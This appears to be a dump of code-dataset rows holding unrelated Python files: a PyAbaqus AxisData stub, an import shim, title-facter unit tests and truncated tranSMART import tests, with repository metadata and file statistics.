] | 7 | 2022-01-21T09:15:45.000Z | 2022-02-15T09:31:58.000Z | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | src/abaqus/XY/AxisData.py | Haiiliin/PyAbaqus | f20db6ebea19b73059fe875a53be370253381078 | [
"MIT"
] | null | null | null | from abaqusConstants import *
from .QuantityType import QuantityType
from .XYCurveArray import XYCurveArray
class AxisData:
"""The AxisData object is used to store the data attributes of axes. An AxisData object is
automatically created when creating an Axis object.
Attributes
----------
dbReference: float
A Float specifying the reference value for decibel computation. The default value is
1.0.
direction: SymbolicConstant
A SymbolicConstant specifying the direction of the axis. Possible values are ABSCISSA
and ORDINATE.
labelFormat: SymbolicConstant
A SymbolicConstant specifying how tick labels are formatted. Possible values are
AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelNumDigits: int
An Int specifying the number of significant digits displayed for the labels. Possible
values are 1 to 7. The default value is 2.
maxAutoCompute: Boolean
A Boolean specifying whether or not to use the automatically computed maximum value for
the axis. The default value is ON.
maxAutoValue: float
A Float specifying the maximum value when **maxAutoCompute** is true.
maxValue: float
A Float specifying the maximum value when **maxAutoCompute** is false. By default,
**maxValue** is set to **maxAutoValue**.
maxShownValue: float
A Float specifying the current maximum value displayed for this axis. This value is
different from **maxAutoValue** or **maxValue** when the axis is being transformed (zoom or
pan).
minAutoCompute: Boolean
A Boolean specifying whether or not to use the automatically computed minimum value for
the axis. The default value is ON.
minAutoValue: float
A Float specifying the minimum value when **minAutoCompute** is true.
minValue: float
A Float specifying the minimum value when **minAutoCompute** is false. By default,
**minValue** is set to **minAutoValue**.
minShownValue: float
A Float specifying the current minimum value displayed for this axis. This value is
different from **minAutoValue** or **minValue** when the axis is being transformed (zoom or
pan).
minorTickCount: int
An Int specifying the number of minor tick marks between major ticks.
Possible values are 0 ≤ **minorTickCount** ≤ 20. When the **scale** is set to LOG, the
minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
8, and 17. The default value is 1.
scale: SymbolicConstant
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
on a 2*decibel scale.The default value is LINEAR.
tickMode: SymbolicConstant
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:AUTOCOMPUTE, specifying tickmarks and labels are automatically computed.INCREMENT,
specifying tickmarks and labels are defined by a given increment.TOTAL_NUMBER,
specifying tickmarks and labels are defined by the total number of ticks.The default
value is AUTOCOMPUTE.
tickCount: int
An Int specifying the number of major tick marks on the axis when **tickMode**
=TOTAL_NUMBER. Possible values are 0 ≤ **tickCount** ≤ 30. The default value is computed
based on the range of the axis. When the **scale** is set to LOG, the tickCount is
interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
tickCountShown: int
An Int specifying the number of major ticks effectively shown. This value takes zoom,
pan and rounding into account.
tickIncrement: float
A Float specifying the increment of the major tick marks on the axis when **tickMode** =
INCREMENT. Valid values are 0 < **tickIncrement**. The default value is computed based on
the results of the automatic method and the range being plotted. When the **scale** is set
to LOG, the tickIncrement is interpreted as a value per decade and should be between
0.05 and 1.
tickIncrementShown: float
A Float specifying the shown tick increment of the major ticks. This value takes
zoom/pan into account.
useSystemTitle: Boolean
A Boolean specifying whether the title to use for the axis title is system defined or
user defined. The default value is ON.
curves: XYCurveArray
An :py:class:`~abaqus.XY.XYCurveArray.XYCurveArray` object specifying a read-only sequence of Curve objects associated to
this axis.
quantityType: QuantityType
A :py:class:`~abaqus.XY.QuantityType.QuantityType` object specifying the quantity type: i.e. the physical dimension and
associated label of the data represented by this axis.
tickValues: float
A tuple of Floats specifying the read-only major tick values shown.
tickLabels: tuple
A tuple of Strings specifying the read-only major tick labels shown.
systemTitle: str
A String specifying the system title. The system title is based on the **quantityType** of
the axis and associated curves.
title: str
A String specifying the title of the axis. By default, the title is set to the
**systemTitle**.
Notes
-----
This object can be accessed by:
.. code-block:: python
import visualization
session.charts[name].axes1[i].axisData
session.charts[name].axes2[i].axisData
session.defaultChartOptions.defaultAxis1Options.axisData
session.defaultChartOptions.defaultAxis2Options.axisData
session.xyPlots[name].charts[name].axes1[i].axisData
session.xyPlots[name].charts[name].axes2[i].axisData
"""
# A Float specifying the reference value for decibel computation. The default value is
# 1.0.
dbReference: float = 1
# A SymbolicConstant specifying the direction of the axis. Possible values are ABSCISSA
# and ORDINATE.
direction: SymbolicConstant = None
# A SymbolicConstant specifying how tick labels are formatted. Possible values are
# AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelFormat: SymbolicConstant = AUTOMATIC
# An Int specifying the number of significant digits displayed for the labels. Possible
# values are 1 to 7. The default value is 2.
labelNumDigits: int = 2
# A Boolean specifying whether or not to use the automatically computed maximum value for
# the axis. The default value is ON.
maxAutoCompute: Boolean = ON
# A Float specifying the maximum value when *maxAutoCompute* is true.
maxAutoValue: float = None
# A Float specifying the maximum value when *maxAutoCompute* is false. By default,
# *maxValue* is set to *maxAutoValue*.
maxValue: float = None
# A Float specifying the current maximum value displayed for this axis. This value is
# different from *maxAutoValue* or *maxValue* when the axis is being transformed (zoom or
# pan).
maxShownValue: float = None
# A Boolean specifying whether or not to use the automatically computed minimum value for
# the axis. The default value is ON.
minAutoCompute: Boolean = ON
# A Float specifying the minimum value when *minAutoCompute* is true.
minAutoValue: float = None
# A Float specifying the minimum value when *minAutoCompute* is false. By default,
# *minValue* is set to *minAutoValue*.
minValue: float = None
# A Float specifying the current minimum value displayed for this axis. This value is
# different from *minAutoValue* or *minValue* when the axis is being transformed (zoom or
# pan).
minShownValue: float = None
# An Int specifying the number of minor tick marks between major ticks.
# Possible values are 0 ≤ *minorTickCount* ≤ 20. When the *scale* is set to LOG, the
# minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
# 8, and 17. The default value is 1.
minorTickCount: int = 1
# A SymbolicConstant specifying the type of scale to use for the axis. Possible values
# are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
# tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
# are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
# on a 2*decibel scale.The default value is LINEAR.
scale: SymbolicConstant = LINEAR
# A SymbolicConstant specifying the type of scale to use for the axis. Possible values
# are:AUTOCOMPUTE, specifying tickmarks and labels are automatically computed.INCREMENT,
# specifying tickmarks and labels are defined by a given increment.TOTAL_NUMBER,
# specifying tickmarks and labels are defined by the total number of ticks.The default
# value is AUTOCOMPUTE.
tickMode: SymbolicConstant = AUTOCOMPUTE
# An Int specifying the number of major tick marks on the axis when *tickMode*
# =TOTAL_NUMBER. Possible values are 0 ≤ *tickCount* ≤ 30. The default value is computed
# based on the range of the axis. When the *scale* is set to LOG, the tickCount is
# interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
tickCount: int = None
# An Int specifying the number of major ticks effectively shown. This value takes zoom,
# pan and rounding into account.
tickCountShown: int = None
# A Float specifying the increment of the major tick marks on the axis when *tickMode* =
# INCREMENT. Valid values are 0 < *tickIncrement*. The default value is computed based on
# the results of the automatic method and the range being plotted. When the *scale* is set
# to LOG, the tickIncrement is interpreted as a value per decade and should be between
# 0.05 and 1.
tickIncrement: float = None
# A Float specifying the shown tick increment of the major ticks. This value takes
# zoom/pan into account.
tickIncrementShown: float = None
# A Boolean specifying whether the title to use for the axis title is system defined or
# user defined. The default value is ON.
useSystemTitle: Boolean = ON
# An XYCurveArray object specifying a read-only sequence of Curve objects associated to
# this axis.
curves: XYCurveArray = XYCurveArray()
# A QuantityType object specifying the quantity type: i.e. the physical dimension and
# associated label of the data represented by this axis.
quantityType: QuantityType = QuantityType()
# A tuple of Floats specifying the read-only major tick values shown.
tickValues: float = None
# A tuple of Strings specifying the read-only major tick labels shown.
tickLabels: tuple = ()
# A String specifying the system title. The system title is based on the *quantityType* of
# the axis and associated curves.
systemTitle: str = ''
# A String specifying the title of the axis. By default, the title is set to the
# *systemTitle*.
title: str = ''
def setValues(self, axisData: 'AxisData' = None, labelFormat: SymbolicConstant = AUTOMATIC,
labelNumDigits: int = 2, scale: SymbolicConstant = LINEAR, dbReference: float = 1,
minAutoCompute: Boolean = ON, minValue: float = None, maxAutoCompute: Boolean = ON,
maxValue: float = None, tickMode: SymbolicConstant = AUTOCOMPUTE,
tickIncrement: float = None, tickCount: int = None, minorTickCount: int = 1,
title: str = '', useSystemTitle: Boolean = ON):
"""This method modifies the AxisData object.
Parameters
----------
axisData
An AxisData object from which attributes are to be copied.
labelFormat
A SymbolicConstant specifying how tick labels are formatted. Possible values are
AUTOMATIC, DECIMAL, SCIENTIFIC, and ENGINEERING. The default value is AUTOMATIC.
labelNumDigits
An Int specifying the number of significant digits displayed for the labels. Possible
values are 1 to 7. The default value is 2.
scale
A SymbolicConstant specifying the type of scale to use for the axis. Possible values
are:LINEAR, specifying tickmarks and labels are linearly distributed.LOG, specifying
tickmarks and labels are logarithmically distributed.DB, specifying tickmarks and labels
are distributed on a decibel scale.DB2, specifying tickmarks and labels are distributed
on a 2*decibel scale.The default value is LINEAR.
dbReference
A Float specifying the reference value for decibel computation. The default value is
1.0.
minAutoCompute
A Boolean specifying whether or not to use the automatically computed minimum value for
the axis. The default value is ON.
minValue
A Float specifying the minimum value when *minAutoCompute* is false. By default,
*minValue* is set to *minAutoValue*.
maxAutoCompute
A Boolean specifying whether or not to use the automatically computed maximum value for
the axis. The default value is ON.
maxValue
A Float specifying the maximum value when *maxAutoCompute* = OFF. By default,
*maxValue* is set to *maxAutoValue*.
tickMode
A SymbolicConstant specifying how tick marks and labels are computed for the axis.
Possible values are: AUTOCOMPUTE, specifying that tickmarks and labels are
automatically computed; INCREMENT, specifying that tickmarks and labels are defined
by a given increment; and TOTAL_NUMBER, specifying that tickmarks and labels are
defined by the total number of ticks. The default value is AUTOCOMPUTE.
tickIncrement
A Float specifying the increment of the major tick marks on the axis when *tickMode* =
INCREMENT. Valid values are 0 < *tickIncrement*. The default value is computed based on
the results of the automatic method and the range being plotted. When the *scale* is set
to LOG, the tickIncrement is interpreted as a value per decade and should be between
0.05 and 1.
tickCount
An Int specifying the number of major tick marks on the axis when *tickMode* =
TOTAL_NUMBER. Possible values are 0 ≤ *tickCount* ≤ 30. The default value is computed
based on the range of the axis. When the *scale* is set to LOG, the tickCount is
interpreted as the number of ticks per decade and acceptable values are 1, 4, 8, and 17.
minorTickCount
An Int specifying the number of minor tick marks between major ticks.
Possible values are 0 ≤ *minorTickCount* ≤ 20. When the *scale* is set to LOG, the
minorTickCount is interpreted as the number of ticks per decade and limited to 0, 1, 4,
8, and 17. The default value is 1.
title
A String specifying the title of the axis. By default, the title is set to the
*systemTitle*.
useSystemTitle
A Boolean specifying whether the title to use for the axis title is system defined or
user defined. The default value is ON.
Raises
------
RangeError
"""
pass
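The parameter constraints documented above can be sketched as a small stand-alone validator. This is a hypothetical helper, not part of the Abaqus API; it only encodes the documented ranges (labelNumDigits 1..7, tickCount 0..30 or {1, 4, 8, 17} on a LOG scale, minorTickCount 0..20 or {0, 1, 4, 8, 17} on a LOG scale, tickIncrement positive, or 0.05..1 per decade on a LOG scale):

```python
# Hypothetical validator mirroring the documented setValues() constraints.
# It is not part of the Abaqus API; it only encodes the ranges stated above.
def validate_axis_values(labelNumDigits=2, tickCount=None, minorTickCount=1,
                         tickIncrement=None, scale='LINEAR'):
    if not 1 <= labelNumDigits <= 7:
        raise ValueError('labelNumDigits must be in 1..7')
    if tickIncrement is not None:
        if scale == 'LOG':
            # Per decade on a LOG scale.
            if not 0.05 <= tickIncrement <= 1:
                raise ValueError('LOG tickIncrement must be in 0.05..1')
        elif tickIncrement <= 0:
            raise ValueError('tickIncrement must be positive')
    if tickCount is not None:
        if scale == 'LOG':
            if tickCount not in (1, 4, 8, 17):
                raise ValueError('LOG tickCount must be 1, 4, 8, or 17')
        elif not 0 <= tickCount <= 30:
            raise ValueError('tickCount must be in 0..30')
    if scale == 'LOG':
        if minorTickCount not in (0, 1, 4, 8, 17):
            raise ValueError('LOG minorTickCount must be 0, 1, 4, 8, or 17')
    elif not 0 <= minorTickCount <= 20:
        raise ValueError('minorTickCount must be in 0..20')
    return True
```

Calling it with out-of-range values raises the same RangeError-style failure that `setValues` documents, just as a plain `ValueError`.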
| 52.679739 | 171 | 0.692432 | 2,131 | 16,120 | 5.246363 | 0.092914 | 0.060465 | 0.044275 | 0.050179 | 0.83551 | 0.824776 | 0.799553 | 0.791413 | 0.790877 | 0.790877 | 0 | 0.00852 | 0.25732 | 16,120 | 305 | 172 | 52.852459 | 0.923321 | 0.820161 | 0 | 0 | 0 | 0 | 0.004242 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027027 | false | 0.027027 | 0.081081 | 0 | 0.837838 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
59599c6e964a4b44be12c430728e226b8762c990 | 94 | py | Python | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 10 | 2017-08-10T18:30:54.000Z | 2020-07-05T10:18:20.000Z | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 1 | 2021-06-21T22:18:22.000Z | 2021-06-21T23:17:08.000Z | mogu/netflow.py | vishalbelsare/MoguNumerics | 4b6b55b562c3fe318552dd48f6b630d618bbbfc2 | [
"MIT"
] | 5 | 2017-05-21T16:54:52.000Z | 2020-07-05T10:18:57.000Z |
# for backward compatibility
from graphflow import simvoltage
from graphflow import pagerank
| 18.8 | 32 | 0.851064 | 11 | 94 | 7.272727 | 0.727273 | 0.325 | 0.475 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.138298 | 94 | 4 | 33 | 23.5 | 0.987654 | 0.276596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5977a7aab6a7165b9c93cd94e3dc639c53721e34 | 7,263 | py | Python | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | tests/unit/facters/test_title.py | scorphus/holmes-api | 6b3c76d4299fecf2d8799d7b5c3c6a6442cacd59 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
import lxml.html
from mock import Mock
from preggy import expect
from holmes.config import Config
from holmes.reviewer import Reviewer
from holmes.facters.title import TitleFacter
from tests.unit.base import FacterTestCase
from tests.fixtures import PageFactory
class TestTitleFacter(FacterTestCase):
def test_can_get_facts(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = self.get_file('globo.html')
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=u'globo.com - Absolutamente tudo sobre not\xedcias, '
'esportes e entretenimento',
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
def test_can_get_facts_with_non_ascii_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
title = u'ãéìôü' * 14
content = '<html><title>%s</title></html>' % title
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=title
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
expect(facter.review.data['page.title']).to_length(70)
def test_can_get_facts_deburring_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
title = 'a' * 70
content = '<html> <title>\n %s\n </title></html>' % title
html_content = lxml.html.fromstring(content)
result = {
'url': page.url,
'status': 200,
'content': content,
'html': html_content
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
facter.add_fact.assert_called_once_with(
key='page.title',
value=html_content.cssselect('title')[0].text.strip()
)
expect(facter.review.data).to_length(2)
expect(facter.review.data).to_include('page.title_count')
expect(facter.review.data).to_include('page.title')
expect(facter.review.data['page.title_count']).to_equal(1)
expect(facter.review.data['page.title']).to_length(70)
def test_no_title_tag(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<html></html>'
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
expect(facter.add_fact.called).to_be_false()
expect(facter.review.data).to_be_like({})
def test_with_empty_title(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = '<html><title></title></html>'
html_content = lxml.html.fromstring(content)
result = {
'url': page.url,
'status': 200,
'content': content,
'html': html_content
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
reviewer.content_loaded(page.url, Mock(status_code=200, text=content, headers={}))
facter = TitleFacter(reviewer)
facter.add_fact = Mock()
facter.get_facts()
expect(facter.add_fact.called).to_be_false()
expect(facter.review.data).to_be_like({})
def test_can_get_fact_definitions(self):
page = PageFactory.create()
reviewer = Reviewer(
api_url='http://localhost:2368',
page_uuid=page.uuid,
page_url=page.url,
page_score=0.0,
config=Config(),
facters=[]
)
content = self.get_file('globo.html')
result = {
'url': page.url,
'status': 200,
'content': content,
'html': lxml.html.fromstring(content)
}
reviewer.responses[page.url] = result
reviewer._wait_for_async_requests = Mock()
reviewer.save_review = Mock()
response = Mock(status_code=200, text=content, headers={})
reviewer.content_loaded(page.url, response)
facter = TitleFacter(reviewer)
definitions = facter.get_fact_definitions()
expect(definitions).to_length(1)
expect('page.title' in definitions).to_be_true()
| 30.012397 | 90 | 0.578962 | 806 | 7,263 | 5.024814 | 0.135236 | 0.051852 | 0.071111 | 0.086914 | 0.835309 | 0.815556 | 0.815556 | 0.806914 | 0.806914 | 0.806914 | 0 | 0.017434 | 0.297122 | 7,263 | 241 | 91 | 30.136929 | 0.775906 | 0.005232 | 0 | 0.763158 | 0 | 0 | 0.090129 | 0.00803 | 0 | 0 | 0 | 0 | 0.015789 | 1 | 0.031579 | false | 0 | 0.042105 | 0 | 0.078947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
597e961232bc885b98a4326cd910d8e6db00aa76 | 11,685 | py | Python | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | null | null | null | resolwe_bio/tests/processes/test_transmart.py | JenkoB/resolwe-bio | a958cf3fc82ebc37f527e1b156753f2324a33803 | [
"Apache-2.0"
] | 1 | 2021-09-03T08:50:54.000Z | 2021-09-03T08:50:54.000Z | # pylint: disable=missing-docstring
import unittest
from resolwe_bio.utils.test import ProcessTestCase
class TranSMARTProcessorTestCase(ProcessTestCase):
@unittest.skip("processor connects to remote tranSMART server")
def test_import(self):
# self.assertDataCount(0)
inputs = {'exps': 'transmart_log_exp.xlsx'}
annotation = self.run_process('transmart-expressions', inputs)
# self.assertDataCount(5)
self.assertFields(annotation, 'expset_type', 'Log2')
self.assertFileExists(annotation, 'expset')
@unittest.skip("processor connects to remote tranSMART server")
def test_import_with_annotation(self):
self.keep_all()
ann = ('/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/18_or_more;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/2to17;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Virology%20Sample%20ID/less_than_2;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Baseline%20visit%20kitID/no;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Baseline%20visit%20kitID/yes;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Bronchoscopy%20visit%20kitID%201/yes;'
'/studies/UBIOPRED/concepts/Sample%20Identifiers/Longitudinal%20visit%20kitID;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/2to17;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Active/unknown;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Active/'
'18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Active/'
'less_than_2;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Active/18_or_more;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Active/2to17;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Active/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Active/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/uncertain;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Age%20Of%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/more_than_twice_a_week;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/once_a_day;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/once_a_month;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Allergic%20Rhinitis'
'%20Diagnosed/weekly;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Congestive'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Active/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Age%20Of'
'%20Onset/no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Coronary%20Diagnosed/'
'no;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Diabetes%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/Done'
'%20at%20screening%20visit;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/DONE'
'%20ON%20SAME%20DAY%20AS%20SCREENING;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/SAME'
'%20DAY%20AS%20SCREENING;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/SAME'
'%20DAY%20AS%20SCREENING%20VISIT;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/'
'SCREENING%20AND%20BASELINE%201%20VISIT%20IN%20THE%20SAME%20DAY;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinusitis%20Active/'
'THIS%20VISIT%20ON%20SAME%20DAY%20AS%20SCREENING; /studies/UBIOPRED/concepts/Subject%20History/'
'Medical%20or%20Surgical%20History/Eczema%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Eczema%20Age%20Of'
'%20Onset/yes;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Eczema%20Diagnosed/'
'null;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Gerd%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hay%20Fever'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Diagnosed/High;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Psychiatric%20Disease'
'%20Diagnosed/med%20to%20low; /studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical'
'%20History/Hypertension%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hypertension%20Age%20Of'
'%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Hypertension'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Osteoporosis%20Age%20Of'
'%20Onset/MOMETASONE%2050MCG; /studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical'
'%20History/Nasal%20Polyps%20Active;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyps%20Age%20'
'Of%20Onset;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyps'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Age%20Of%20Onset/PLUMBING%20AND%20HEATING%20ENGINEER%20QUALIFICATIONS;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Nasal%20Polyp%20Surgery'
'%20Diagnosed;'
'/studies/UBIOPRED/concepts/Subject%20History/Medical%20or%20Surgical%20History/Sinus%20Surgery'
'%20Active/no;'
